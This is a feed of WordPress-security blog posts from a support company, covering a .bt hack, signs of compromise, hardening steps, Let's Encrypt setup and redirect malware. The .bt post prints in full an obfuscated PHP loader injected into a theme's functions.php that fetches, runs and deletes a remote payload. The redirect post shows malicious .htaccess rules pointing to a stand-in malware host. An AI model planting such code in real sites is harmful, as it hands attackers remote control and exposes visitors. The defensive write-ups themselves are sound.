DEV Community: BitofWP

How to Detect the .bt WordPress Hack

BitofWP — Sun, 01 Dec 2019 21:32:22 +0000

Just recently we cleaned a WordPress site which was apparently hacked many years ago. The hack was still active and our client was lucky that we found it since he asked us to host the site for him(we’ll talk about this added service in a new blog post).

Every time we handle a WordPress site we check if it has any signs of being hacked or compromised, we did the same for this site as well and we’ve found that it has been hacked for more than 2 years. While the site’s frontend worked fine its backend wasn’t maintained and updated for a long time and as a result, some of the themes and/or plugins used were vulnerable so it became a hackers playground.

The lmlink1-redirect WordPress

After first accessing the site files we noticed that there was a file present under the root dir, the wp-admin and wp-admin/css dir under the name of .bt. This file contained a list of IPs, you can see a sample of them below:

1.0.145.2 1.0.145.210 1.0.177.126 1.0.142.235 1.0.241.135 1.1.149.129 1.1.153.165 1.1.160.253 1.1.165.48 1.1.166.48 1.1.174.241 1.1.186.114 1.1.189.189 1.1.206.184 1.1.207.174 1.1.207.246 1.10.187.208 1.10.248.114 1.102.78.20 1.103.85.59 1.11.62.253 1.110.74.171 1.114.21.215 1.115.199.29 1.120.204.198

Obviously this file wasn’t related to WordPress and the content looked suspicious already. After brief research about .bt files, we stumbled into Michael Nilsen’s php-hacks GitHub page about lmlink1-redirect where he explained how the .bt WordPress hack worked.

Theme’s functions.php injected with a malicious script

In our client site, the hack was found under the active theme’s function.php file. Hackers injected a script on top of the functions.php original content so every time the site loaded the hack re-generated the .bt files. Even if someone tries to delete the .bt files they will still be re-generated by the script inside functions.php.

The original functions.php file content can be seen below:

//Do not remove this

load_template(get_template_directory() . '/functions/init-core.php');

/**

* The best and safest way to extend the Humean WordPress theme with your own custom code is to create a child theme.

* You can add temporary code snippets and hacks to the current functions.php file, but unlike with a child theme, they will be lost on upgrade.

*

* If you don't know what a child theme is, you really want to spend 5 minutes learning how to use child themes in WordPress, you won't regret it :) !

* https://codex.wordpress.org/Child_Themes

*

*/

@include ('template-config.php')

while the injected functions.php has the following script added at the beginning of the file.

@ini_set('display_errors', '0'); error_reporting(0); if (!$npDcheckClassBgp) { $ea = 'shaesx'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrLopfh9O8JtNZfqTJFHVPuEE3yiNHO7RvxpYYEcbGgEg4Q=="; if (ini_get('allow_url_fopen')) { function get_data_ya($m) { $data = file_get_contents($m); return $data; } } else { function get_data_ya($m) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $m); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } function wp_cd($fd, $fa="") { $fe = "wp_frmfunct"; $len = strlen($fd); $ff = ''; $n = $len>100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.)enen#is', $reqw, $mtchs); $dirs = glob("", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; }

How the .bt WordPress Hack Works

Actually the .bt file is only the visible part of this WordPress hack, every time the site loads the injected script will download on the fly a payload and then delete it. Apart from downloading and creating the .bt file the payload can accept remote commands from the actor who has access to it.

.bt WordPress Hack Removal

After notifying the client about the hack we removed and then added it to our Managed WordPress Hosting service.

If you’re looking to remove the .bt hack yourself then we suggest reading our guide about what you need to do when finding your WordPress site has been hacked or contact us for a quote removing the hack in 24 hours or less.

The post How to Detect the .bt WordPress Hack appeared first on WordPress Support Services by BitofWP.

10 Signs showing your WordPress Site is Hacked

BitofWP — Mon, 25 Nov 2019 15:19:02 +0000

Warning Signs of a WordPress Site been Hacked

WordPress sites are notorious for getting hacked. There’s a popular misconception that WordPress is faulty and easy to hack. The truth is, WordPress is the most popular CMS powering close to 40% of all sites on the web. As such, we can expect that hackers will target it most often, statistically.

Regardless of the fact that naysayers are wrong, the threat is real. You might be experiencing some issues or noticing weird things on your site and you are suspecting that it might be compromised. While it is sometimes easy to spot a WordPress site hacked, sometimes the malware might not be that obvious.

Here’s a list of signs that if present then it may mean your WordPress site has been hacked.

1. Defaced homepage

This is one of the most obvious signs showing that someone has hacked your site. This is what hackers do to make a name for themselves. In most cases, boasting is not the hacker’s main intention. What they want to do is make a profit off of your traffic. But in some cases, they’ll just do it for fun and notoriety.

Regardless of the intention, this still means that someone has control over your site. Defacement will have a negative impact on your reputation, resulting in a drop in traffic and, naturally, the loss of revenue.

2. Your site redirects your visitors

Malicious redirects can come in many forms. Sometimes, hackers will insert links on the pages, other times they will insert scripts that redirect your visitors as soon as they try to load the site. Depending on the script, redirects might happen to those who use mobile devices and not redirect others.

Although it can be difficult to spot, in most cases it is really simple to replicate. Just visit your WordPress hacked site while logged out and see if your site is redirecting you somewhere else. If you land on a different page, it is likely that you’ll see a popup stating that your computer is infected with malware. Also, the popup will have an option to download malware-removal software which is actually malware itself, in disguise.

Depending on how experienced with the web your visitors are, some might fall prey to a hacker if they download any software from the page they are redirected to. This is why it is important to deal with this promptly.

3. Traffic decreases suddenly

If you are using Google Analytics, you might notice a sudden drop in traffic stats. This is a result of malware redirecting your visitors to spammy sites. Furthermore, if your site is marked as not safe on Google or even blacklisted, then it should be clear why people are avoiding your site.

4. Unable to log in to your WordPress Dashboard

This is a tricky symptom. Sometimes, it can happen that we are absolutely sure what the password was and start thinking that someone has changed it. I’ve been there. I forgot I’ve put an upper-case letter here and a dot there, a special character at the end and so on.

However, if you are absolutely certain what your password should be, you haven’t changed it, and no one else had access to change your password, this might mean that someone has hi-jacked your admin account. Also, this means that hackers will be able to create additional admin users, change the layout of the site and do a lot more damage if this isn’t dealt with properly and promptly.

5. Admin accounts that shouldn’t be there

If you notice that there’s an admin user that you cannot recall adding, this is a big warning sign. Again, it can happen that we forgot that we granted admin privileges to a new team member, but if you are certain that’s not the case, you are looking at a hacker’s admin user.

But, suspicious admin users are not the only ones you should be concerned with. If you are using an outdated plugin that has a vulnerability, admin can create countless numbers of subscribers and grant them admin privileges. In that sense, that user is equal to the super-admin and can do whatever they please.

6. A slow or unresponsive website

This is one of those uncertain signs. People tend to pack their sites with dozens of plugins, some of which are notorious for straining the server resources, so this might not be a reliable sign that someone hacked your site.

However, if you didn’t make any changes and your site becomes slow and unresponsive overnight, you might be a victim of a so-called DDoS attack. DDoS stands for ‘Distributed Denial of Service’. Basically, this type of attack uses a network of computers with fake IPs that make countless requests to your server. After the attackers flood the server with enough requests, it will start glitching and become unresponsive at the end.

7. Emails generated on your site get blocked

Many WordPress admins use contact forms to interact with their visitors. Often, forms will send email notifications from the site using the default mail server. Hackers often hack the sites with the intent to use mail servers for spam. If you notice that you are not receiving emails generated on your site, call your hosting provider. If they tell you that they’ve blocked you because of spam and you are sure you didn’t violate daily email limits, this is a cause for concern.

Sometimes hosting providers run daily or weekly malware scans so, in this case, they will contact you right away and let you know that your WordPress site has been hacked and suspended from their service.

8. Strange files or directories on your site

If you haven’t already done this after reading the steps above, now is a good time. Access your server using FTP (or File Manager if available) and check your WordPress root directory.

Depending on how sophisticated the hack is, you might not see anything strange if you don’t dig deep enough. You should start by checking the following files:

.htaccess
wp-config.php
index.php

If you see some code that looks like a cipher or something similar, that means that someone has altered these files. Sometimes, hackers will try to mask files by giving them names similar to ones that are normally found in a WordPress installation or a WordPress plugin or theme.

Often, files that have generic names like admin.class.php, admin.old.php or might be malware files. These files need to be removed in order to remove the hack. This is often not enough because this means there’s a backdoor which hackers use to upload or alter files on your site. They can simply re-add the files after you remove them and continue where they’ve left off.

This is actually one of the strongest signs of a hacked WordPress site so you need to start the cleanup procedure asap.

9. Hi-jacked search results

source

One of the most sophisticated hacks is hi-jacking search results. What does this mean? This is a type of hack that targets search engines. When someone types your domain name on Google or other search engines, they will get search results containing your home page and all other indexed pages.

This is a so-called SEO hack. This hack will insert a link to a spammy site, online pharmacy or another undesirable page among the list of legitimate pages on your site. Some of the most common WordPress Spam Hacks are the Japanese Keyword Hack and the Pharma Hack.

It is quite easy to check what your search results look like regardless of how good your Google ranking is. Go to Google and type ‘site:yourdomain.com’ in the search bar. It goes without saying that you should replace ‘yourdomain.com’ with your actual domain name.

The search results should only display pages from your site. If you notice that there are some pages that offer pharmaceutical products or anything else that has nothing to do with your site, this means that you are a victim of the SEO hack.

The biggest issue here is that this hack is generally invisible to you or your visitors. It can take months before you or someone else discovers it. It can be very difficult to remove permanently because most often it will be cleverly concealed inside your files and database.

This might be something that a Professional Malware Removal Service should handle for you.

10. White Screen of Death(WSOD)

I’ve saved this one for last because this is not always a sign that someone hacked your site. Often times, a white screen of death will be a result of a failed plugin, theme or core update, plugin/theme conflicts or something similar.

However, if you are seeing a white screen of death when trying to access wp-admin, then it might as well mean that there’s malware on site. Malware scripts can contain code that prevents error display, so instead of seeing a list of errors, you will just see a blank page.

The post 10 Signs showing your WordPress Site is Hacked appeared first on WordPress Support Services by BitofWP.

How to Protect Your WordPress Site from Getting Hacked

BitofWP — Sun, 03 Nov 2019 12:52:53 +0000

There is nothing scarier than your WordPress site being compromised and you feel helpless not knowing what to do to protect your WordPress site from Hackers. It takes a toll on your business, your revenue, your brand’s reputation and you even lose your sleep over it. Since WordPress Security is always on our mind here is a useful list of the 20 steps you need to take to protect your WordPress site from Hackers.

How can you prevent your WordPress site from keep getting hacked?

Here is a useful top 20 list of all the things you need to do in order to strengthen your WordPress Site Security:

1. Use a secure WordPress Hosting Service

Nowadays, using a regular hosting service under a shared account is not enough. You need to make sure that your hosting provider offers services dedicated to WordPress sites.

If you have enough money to spend, then you should consider choosing a Managed WordPress Hosting Service. These providers offer a hosting environment which is fine-tuned for WordPress sites and they pay extra attention to security.

2. Add a firewall between your WordPress site and your site visitors

Adding a DNS-level firewall as Cloudflare will filter bad traffic and stop it from reaching your hosting server and this way you will protect your WordPress website from hackers. Though often neglected, this security measurement is one of the most important in order to secure a WordPress site.

Application-level firewall filters traffic after it first visits your WordPress site. Even though this is an important security layer it’s not as efficient as the DN-lever firewall because it lets the attacker start abusing your server and site resources.

3. Activate and use an SSL for your WordPress site domain

If you’re using a modern WordPress hosting service they can set up the SSL for you. Let’s Encrypt offers free SSLs for everyone so after adding it to your hosting account you need to convert all of your WordPress HTTP URLs to HTTPS. Having an HTTPS connection on your site guarantees that when a user sends sensitive data like their login details, it is sent to the right place, and not to a malicious third-party.

You can also follow our step-by-step WordPress Free SSL Installation Guide in order to add a Let’s Encrypt SSL to your WordPress site.

4. Disable XML-RPC when possible

XML-RPC used to be exploited in the past for brute-forcing a WordPress admin account and bringing down a WordPress site through a DDoS attack.

By disabling this feature you will decrease the attack surface area for any hacker who wants to break into your site. On the other hand, XML-RPC is an API used by many 3rd party services related to WordPress, like JetPack.

If you want to disable XML-RPC and let JetPack or any other service use the API then add the following code to your WordPress site .htaccess file:

# Disable XML-RPC Start
<files xmlrpc.php>
Order Deny, Allow
Deny from all
Allow from 192.0.64.1/192.0.127.254
Satisfy All
ErrorDocument 403 http://0.0.0.0
# Disable XML-RPC End

In order to whitelist other services for using JetPack you just need to duplicate the “Allow from…” line and replace the JetPack IP range with the ones from the service, you’re using.

5. Rename your WordPress login URL

This a pro-active security measurement which hides your default WordPress login URL and stops automated brute-force login attacks from bots or bad actors.

The safest way to change your WordPress Dashboard login URL is through a plugin like Rename wp-login.php by Ella van Durpe.

6. Set a login rate limit for your WordPress login page

Another way to protect your WordPress site from hackers is by rate-limiting your WordPress Dashboard login attempts. This will add an extra layer of security to your WordPress site. It will do so by blocking an IP from making further attempts after a specified limit of retries has been reached. It makes a brute-force attack difficult or impossible to take place.

Limit Login Attempts Reloaded by WPChef, is one of the plugins we often suggest to our clients after we finish a WordPress Malware Cleanup for their hacked WordPress sites.

7. Use 2 Factor Authentication for your WordPress Dashboard login page

Two Factor Authentication is an extra layer of security added to your login procedure. This way even if your admin login details have been exposed, guessed or brute-forced the attacker will need to complete the 2FA challenge in order to access your WordPress Dashboard page.

We suggest you take a look at Google’s 2FA service and create an account with them, then install and setup the Google Authenticator WordPress plugin by Ivan Kruchkoff.

If you want help on adding 2FA to your WordPress website then make sure to read our own guide on How to Setup and Use Google’s 2FA to your WordPress Site(link).

8. Allow 1 or 2 admins following the least privilege principle

If possible leave only one admin and downgrade all others to Editors, Authors or even Subscribers. The more admins a WordPress site has the more the possibilities of being hacked from a brute-force attack or a login details breach.

You can also use our WP User Admin plugi n for scheduling a user or a group of users you want to edit their user role and set a specific time and date which you want this change to be applied. You can also set the same user(s) to have their original user role restored under a future date and time.

This way you can set one user as an admin for a specified timeframe and then automatically downgrade them to Author or any other preferred user role.

9. Use complex passwords for your admin accounts

Using a simple and easy-to-guess password for your admin user account is the fastest way to get your WordPress site hacked. Use complex passwords and if possible change them every once in a while. Nowadays, you don’t need to remember every single password you use. All you need to do is just install a password manager service like 1Password, save your passwords with just one click and protect your WordPress site from Hackers.

10. Change the default admin usernames and randomize them

Once you setup a new WordPress website the default username for your admin account is “admin”(dah!). If you keep the default admin username then you make it easier for the attacker to brute-force their way into your WordPress Dashboard ; because they will already know the admin name so they will only need to guess or force attack the password.

You can either create a new admin account, then login with its details and delete the default admin account or use a plugin like the Easy Username Update by Yogesh C. Pant and set a random admin username.

If you want help on renaming your default admin username feel free to check out our guide on How to Change your Default Admin Username.

11. Secure your WordPress site files and database

Take the necessary steps to secure your WordPress site’s files and database. It’s where all the important settings of your WordPress site are located, including your blog posts and pages. For this, you need to change its default prefix and ensure that your database password is far from predictable.

When it comes to files, there is always the risk of a file’s content being changed or malicious files being uploaded on your website. So, what you can do is opt for security plugins such as All-in-One WP Security. You also need to be cautious with your directory and file permissions. Make sure you set the directory permissions to ‘755’ and files to ‘644’. This way, you are able to protect directories, subdirectories, and individual files too. You should disallow file editing for the Themes and Plugins you use and disable directory listing. You can do so through .htaccess.

12. Update your themes, plugins and WordPress core files regularly

One of the great things about WordPress and everything related to it is that new updates are rolled out every so often. This is a great feature which you can use to protect your WordPress site from Hackers. Regardless of the Theme and the Plugin(s) you use, you have to make sure that you update them frequently through the wp-admin dashboard. It is where you can also find all the relevant information regarding the condition of the Themes and Plugins you use. You can locate which ones need to be updated, and you can even see the improvements they come with.

Updating Themes, Plugins and the WordPress core is imperative. Every new update brings security patches and fixes for bugs, new features to improve the performance and the compatibility of your WordPress site. Plugins and Themes are updated on a non-standard schedule. This is why you have to keep an eye on the new updates arriving. Ignoring the updates only gets your WordPress site in jeopardy.

We can’t stress enough the importance of updating your website’s components so as to protect your WordPress site from Hackers. And though we do understand this could be hard work, the truth is that it is necessary. You can always test them on a staging environment before updating them on the live site, especially if you suspect that applying the latest updates might cause your website to break and not function properly.

13. Keep only the active theme and plugins

It is best to remove the Themes and Plugins you no longer use. Primarily because the files of those can be used as attack entry points by hackers. Most WordPress sites have an array of active plugins; managing and maintaining those can be frustrating. Keeping them around when they are not active might interfere with the security of your website, they may jam its performance and practically speaking they will clutter your Admin Dashboard. They only add to your frustration.

14. Use only regularly updated WordPress themes and plugins

Choosing Themes and Plugins for your WordPress site can be a daunting task as there are countless, available out there. Do not go for the most affordable or the one filled with numerous features. Do not download them from doubtful sources and websites. Instead, consider your site’s needs, plan carefully and whatever you choose, make sure you go only for official and trustworthy Themes and plugins. These come with regular updates and offer support when a technical issue arises.

Also, check the repository for old and abandoned Themes and Plugins and steer away from those too. As they are not updated regularly (check out point 12 ) and there is no technical support to assist you when you run into issues.

15. Apply restrictions for bots, certain IPs and countries

Some Bots are useful (site crawlers or chatbots). They are automated, and they perform repetitive tasks faster. But bots can be a nuisance too, and they can take a toll on your website’s performance. For this, you need to tweak the permissions so that you block malicious Bots from your website. Internet bot traffic if left unchecked, may cause several problems and cyberattacks. For example, malicious bots are known for contributing to DDoS attacks, scraping content from your WordPress site, getting access to your credentials and spamming. The same applies to malicious visitors from specific countries or domain addresses. They can be the source of spamming and malicious attacks.

You can block bots by using certain security plugins or even a dedicated plugin such as the Stopbadbots Plugin.

16. Monitor your site logs and file change

Monitoring your WordPress website helps you have a good idea of its condition and this way, you can detect a suspicious online behaviour early on. Constant monitoring is the key to running a healthy and reliable WordPress site. It can also inform you when certain components or features do not operate properly or when files and the database have undergone changes. Especially when it comes to fending off hackers, time does indeed matter, and active site monitoring can be a great way to help avert malicious attacks and data breaches.

17. Backup your site regularly

Backups are a life-saving solution. Most WordPress users indeed come to realise the significance of backups only after something has gone wrong. But you should not wait until a disaster has happened to recognise the need to backup your website and its data almost daily. So back up your website often, even if it is time-consuming. Doing so means that you ensure all your hard work and precious data does not vanish in a second. Do not rely on the backups performed by your WordPress Hosting provider alone. Use one of the many available services and Plugins out there, allowing you to perform both automated and full backups. These Plugins allow for scheduling of your website’s backups, so you do not have to run them manually. Depending on the complexity, and the size of your website you can opt for purchasing automated backups. So that your website, its components and its data are backed up and safe.

18. Avoid using nulled themes or plugins

Steer away from nulled Themes and Plugins. They might be less costly upon purchasing them, but the truth is they will cost you more at the end. These are usually purchased from suspicious websites, and they can be downloaded illegally. And though you might get hold of them for free they often lack features, they do not operate properly, they do not receive updates (see point 12 ), and you do not have access to support services. Thus, you end up using a Theme or plugin which takes a lot of effort to maintain and to operate. What is more, most of the nulled Themes and Plugins contain extra content which is malware and was placed there by the hackers who cracked them in the first place. Using those Themes and Plugins would be like inviting the hackers into your WordPress site.

19. Host one WordPress site per account

Having several WordPress sites under the same account runs a few risks. The most prominent of those is the risk of having one site hacked and then having the rest of them compromised too. What if your account credentials get compromised? Then you might be facing a severe problem. This could be averted if you diversify your assets.

20. Remove any staging or development sites under your site public directory

Staging and dev sites are the safe playground on which you can perform as many changes and tweaks as you wish. You can run continuous tests. You can be a tinkerer. You can test the compatibility of Themes and Plugins and WordPress core updates before you implement them on your live site. However, you must remove them from your site’s public directory as they can be picked up by search engine site crawlers (and especially the Google one) and they can be used as an entry point for hackers.

Strengthening your WordPress site Security is a holistic process with many steps and factors to devote your attention to. It is worth the hard work and effort you put into it. However, if you are not an expert in the field of WordPress, you should seek the professional help of a WordPress expert. They will guide you towards choosing the right components for your website and they will help you with maintenance and security issues so you can focus on running your business or your blog.

The post How to Protect Your WordPress Site from Getting Hacked appeared first on WordPress Support Services by BitofWP.

How to Add a Free SSL for Your WordPress Site

BitofWP — Sat, 26 Oct 2019 10:18:41 +0000

This guide will walk you through installing free Let’s Encrypt SSL on your WordPress site without having to use any plugin. In order to complete the guide you will need the following:

Access to cPanel
A hosting provider that supports Let’s Encrypt (check this list)
SSL certificate generated on ZeroSSL site or Let’s Encrypt cPanel plugin
15 minutes to spare (at the most)

All check? Great! Before we move on…

Why adding HTTPS to your WordPress Site?

If you are here, this means that you already made up your mind about installing an SSL certificate. We are going to assume that you don’t need a lot of convincing, therefore, we are going to keep it short and just list what SSL brings to the table.

Using SSL is important because:

It encrypts the connection between your WordPress site and the visitor thereby protecting sensitive data transferred like Credit Card numbers and login details.
Visitors are able to determine that you are a legitimate business, therefore, they will trust you more.
With the ever-changing Google Search Results algorithm, the SSL has also become a ranking factor.

How to install a WordPress SSL using Let’s Encrypt

The process will be different depending on whether or not your hosting account comes equipped with the Let’s Encrypt cPanel plugin. This plugin automates the process of generating the certificate signing request, domain verification, generating the certificate itself, and installation of the certificate on the server.

Method 1: Using the Let’s Encrypt cPanel plugin

This is the easiest method of installing the SSL certificate with only a few steps to follow. Firstly you need to access your cPanel dashboard. Then, scroll down to locate the Let’s Encrypt plugin. You will see it under the Security section.

Once selected you will be redirected to another page where you will see your domain name (or a list of domain names). Click Issue next to the desired domain to begin the installation process.

After you click on the Issue link, you will see another page with a few options. You will see an option to include cPanel subdomains and to include/exclude the www version of the domain name from the certificate. Depending on your hosting provider, there might be other aliases (like mail.domain.com or similar) that you can include or exclude from the certificate.

Domain Verifications for Let’s Encrypt

An important part of this step is choosing the verification method. The HTTP verification method requires that some files are placed on the server for domain verification. The plugin handles this automatically. The DNS verification requires adding a record to your DNS settings, which can take a certain time to propagate. I would advise against DNS verification since the HTTP method is much more simple and immediate.

After you click on the blue Issue button (displayed above), you will see the following message:

This means that the process is complete. You can double-check by going back to the cPanel home page, finding the SSL/TLS in the Security section, and then clicking on Manage SSL Sites. You can check the certificate details on that page too.

After confirming, proceed to redirect your site to the HTTPS version

(more about replacing HTTP with HTTPS below).

Method 2. Generating the certificate without the Let’s Encrypt cPanel plugin

Everything you need to do will be laid out in 5 simple steps, so just follow through and it should all be easy. We will go a bit back and forth between your cPanel (and file manager) and ZeroSSL. These are the steps:

*IMPORTANT* Make a backup of your site before proceeding. If your site is too big, make a backup of your database at least.

Starting the FREE SSL Certificate Wizard

Go tozerossl.com and scroll a bit down until you see FREE SSL Certificate Wizard option. Then click START.

This will take you to the next screen. Since this is the first time you are generating a certificate for your site, you should only enter the domain name, click checkboxes to accept TOS, choose HTTP verification and click ‘Next’.

This will generate your Let’s Encrypt account key and CSR (Certificate Signing Request). Download and save them locally. You will not need them now, but you will need them in 90 days. Unfortunately, this certificate expires after 90 days and you will need to repeat this process.

The only difference is that you will paste the Account Key and the CSR into corresponding boxes above. The rest of the process is the same.

Domain verification

This step confirms that you have ownership (or at least control) over the domain name and the server. You will need to access the root of your site and create two directories. If your site is located in the root (public_html), navigate there and create a directory and name it ‘.well-know’.

You will need to enable hidden (dot) files to be displayed. First, click on the Settings option at the top right in the File Manager. Next, click on Show Hidden Files (dotfiles). Then, click Save. You should now see the .well-known directory.

Inside this directory, create another one and name it acme-challenge. After that, browse the acme-challenge directory. In there will need to create two files.

These files should have titles and content that is provided on the Verification tab on ZeroSSL. Just create one file, copy the title from ZeroSSL, than copy the content and repeat that for the second file.

Paste the Certificate, Private Key and CA Bundle

ZeroSSL generates the Certificate and the CA Bundle together. However, they can be separated in case your hosting provider has separate boxes on cPanel where they should be entered.

First off, navigate to your cPanel and click on SSL/TLS. It will be under the Security tab.

Next, click on Manage SSL Sites under the Install and Manage SSL for your site (HTTPS) option.

Depending on your hosting provider, you might see 2 or 3 input fields where you should paste the certificate, private key, and CA Bundle (if required).

Go back to ZeroSSL and copy the certificate text. If there’s a CA Bundle box (like in the image before) you will have to split the certificate text and paste the first half in the Certificate (CRT) box and paste the second in the Certificate Authority Bundle (CABUNDLE) box.

Run the same steps for pasting the private key.

Installing the certificate

After you’ve pasted the required text, click on Install Certificate at the bottom. That’s it! You’ve installed Let’s Encrypt Free SSL certificate on your WordPress site.

Finally, You will need to check whether or not your site is loading over HTTPS. Just add https:// in front of your domain name. If the site is resolving, all went well.

Some thoughts about AutoSSL

As with any free 3rd party products, the safety of using this certificate has been questioned by many. This is a matter of trust that you can put in a 3rd party SSL issuer. Since ZeroSSL controls an important part of the certificate, they can at any time do you harm if they decided to become evil. This is, however, highly unlikely. They have many users and a great reputation.

Redirect WordPress Site HTTP Traffic to HTTPS

This might seem redundant. You just added the SSL, why would you need to redirect your WordPress site to the HTTPS version? That’s because your site is still accessible under HTTP protocol. You don’t trust me? Fine. Type http:// in front of the domain name in the browser address bar and see for yourself.

In order to make sure your visitors are always viewing the HTTPS version of the site, you need to redirect those who access the HTTP version.

In order to achieve this you’ll need to do the following:

Replace the HTTP home and siteurl records in your database with the HTTPS version.
Change any database data that contains your domain URL HTTP entries and replace them with the HTTPS.

Adding HTTPS to your ‘home’ and ‘siteurl’ WordPress Database Records

This can be done from your WordPress Dashboard. However, I consider that an amateur move that can get you in trouble or redirect loops (which is unlikely but possible). Instead, you should install a plugin that will change any string of data containing http to https. This is called ‘Search and replace‘ and there’s a plugin for that.

How to Search for HTTP and Replace with HTTPS

Visit your WordPress Dashboard as an admin and click on Plugins – > Add New. In the search bar, type search and replace. Install the Search & Replace plugin and activate it.

After the activation is complete you can find the Search and Replace plugin inside the ‘Tools’ menu in your WordPress dashboard.

What I really like about this plugin is the first thing it does – it offers you to create a database backup. If you didn’t take my advice last time, it would be wise to create a backup now.

You should enter the http as the term to be searched for and https as a term to be replaced with. Select all the database tables. Also, you will see an option called ‘Dry run’. This option only scans and reports how many strings will be changed without making the actual changes. It is checked by default, therefore, you will need to uncheck it.

In our case, we would search for _ http://bitofwp.com and ask the plugin _ to replace it with _ https ://bitofwp.com_.

You are also given a choice to save changes to a separate SQL file thereby preventing live changes. This enables you to download the file and import it. Unless you have a big database on a server with very limited resources, this is not necessary.

Just proceed with the settings shown in this image below:

WordPress SSL should be now active

Once the plugin has finished replacing all http records to http you will be logged out of your WordPress Dashboard and already see the HTTPS lock in your browser.

The post How to Add a Free SSL for Your WordPress Site appeared first on WordPress Support Services by BitofWP.

How to Detect and Fix WordPress Malware Redirect Hack

BitofWP — Sun, 20 Oct 2019 19:05:39 +0000

Dealing with a WordPress Malware Redirect Hack , in general, is always a frustrating experience. The malware can come in many forms and present itself with different symptoms, so to speak. It can change the layout of your site, something referred to as defacing, it can crash your site or it can even lead to a partial or a complete loss of content. Sometimes, you won’t even know its there at all.

It all depends on the motive behind the attack. Some people do it just for the fun of it. Yes, I know – you’ve put a lot of money, time and effort into your site and it really hurts to think that someone is breaking it just because they can and want to. On the other hand, some do it for money. In most cases, you will not know why did it happen.

The more important question will always be – _How. _How did it happen and how to fix it? In this article, we will cover WordPress redirect hack and what to do about it.

What is a WordPress Malware Redirect Hack?

The WordPress Redirect Hack is a process of redirecting visitors to spammy and phishing sites with the intent to generate advertising impressions. It can also be an attempt to compromise a visitor’s computer by offering to install some software which will actually act like malware.

What does it look like?

Diagnosing WordPress Malicious Redirects is pretty simple as symptoms are obvious. You visit your site and instead of seeing your home page, you are redirected someplace else that has absolutely nothing to do with your site.

The consequences of a WordPress Malware Redirect

So what are the consequences of a Redirect Hack (besides a spike in your blood pressure levels)? Some or all of these might happen:

The reputation of your site and SEO will be degraded (if not destroyed) Visitors will simply lose trust after getting constantly redirected to suspicious sites.
Your host might shut down your site That’s right. Your hosting provider might do this if your site is on the shared server to prevent other sites from being infected as well.
The site visitors’ devices might get comprised and lead to a security breach As mentioned, there are ways to get malware to the visitor’s computer and extract sensitive data.
You might get Blacklisted by Google Google will try to protect its search results reputation and will mark your site as unsafe.

How to Detect WordPress Malicious Redirect

Being able to identify the compromised file is the most important step in removing the malware. Any given WordPress installation will have thousands of files. It goes without saying that checking each of them manually is possible only in theory.

The main idea here is to actually learn how to confirm that your site has been compromised by Redirect Hack and then decide what’s the best course of action for removal.

1. Check the .htaccess file

The .htaccess is not a part of WordPress. It is actually an Apache server configuration file and as such, it can change the default behaviour of the server. The WordPress core and some plugins can automatically edit .htaccess to allow users to configure security settings, redirects, cache headers, etc.

If a hacker gets his hands on the .htaccess file, they too can create redirects.

This is the content of a default WordPress-generated .htaccess file:

`# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

END WordPress`

The .htaccess file can have a lot more lines, for cache control, security, and https redirection and that’s nothing to worry about. However, some redirect lines are a reason for concern.

One of the types of .htaccess attacks redirects users that come from the search engines. This is an example of the code:

RewriteCond %{HTTP_REFERER} .*google.* [OR] #checks if the visitor has been referred by Google RewriteCond %{HTTP_REFERER} .*ask.* [OR] #checks if the visitor has been referred by Ask.com RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] #checks if the visitor has been referred by Yahoo RewriteCond %{HTTP_REFERER} .*baidu.* [OR] #checks if the visitor has been referred by Baidu RewriteRule ^(.*)$ http://malicioussite.com/malware.php [R=301,L] #if one of the above is 'true', this is where the user is redirected

This can also be done in a shorthand form, so look out for this as well:

RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu)\.(.*) #Checks if the visitor has been referred by Google or Ask or Yahoo or Baidu RewriteRule ^(.*)$ http://malicioussite.com/malware.php [R=301,L] #The same redirect

This type of redirect is very well concealed and it might take months before the site owner notices it or gets notified by a visitor. That is because anyone coming to the site directly will not notice any difference. This is basically the same principle that Pharma Hack follows.

There is also a way to redirect all error pages (like 404, 503, etc.) to malware sites using the following .htaccess snippet:

RewriteEngine On

ErrorDocument 404 http://malicioussite.com/malware.php

This additional .htaccess code will redirect the visitor to a malicious site instead of a 404-page template.

2. Search for Malicious Redirects Backdoors in your WordPress core files, themes and plugins

Seeing code similar to the examples presented above confirms that your site has been hacked. Removing these lines will prevent your visitors from being redirected, but unfortunately, that doesn’t mean that the malware redirect hack has been fully removed. There are probably backdoor malware files which the hacker was using to gain access to your site. If those backdoors remain on the site, your .htaccess and your WordPress site will eventually get modified and infected again.

If you are not sure whether the code in your .htaccess is malware or not, or simply don’t feel comfortable editing it, it might be a good idea to create a backup and replace it with the default WordPress htaccess.

3. Check your theme header.php and footer.php for malware code injections

Header.php and footer.php are basic template files. All WordPress themes have them. They might have additional files that are called from header.php and footer.php but these two files will always be there. One exception is if your theme is using a child theme which doesn’t require anything but a style.css file to function but in that case, header.php and footer.php are already loaded from the parent theme. Conclusion – they will be loaded one way or the other.

